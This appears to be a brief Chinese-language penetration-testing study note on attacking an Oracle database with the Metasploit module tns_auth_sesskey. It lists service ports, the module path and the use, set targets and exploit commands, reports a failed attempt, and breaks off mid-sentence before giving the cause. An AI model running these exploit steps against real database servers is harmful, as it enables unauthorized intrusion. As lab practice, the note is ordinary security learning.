第三方網路服務滲透攻擊實戰:Oracle數據庫
提示可以在網上找到很多常用網絡端口對照表,作爲平時的積累
oracle:tcp1521
mysql:3306
msf的exploit路徑:/usr/share/metasploit-framework/modules/exploits/windows/oracle/tns_auth_sesskey.rb
攻擊過程:
use exploit/windows/oracle/tns_auth_sesskey
通過show options設置如下:
set targets 0 :我用的targets,讓其自動探測
exploit
但是會不成功
在exploit,還是錯,但提示比變了,說明有效果
經驗:滲透不成功。往往是因爲與目標版本不一致的原因
通過分析,不是版本問題,而是: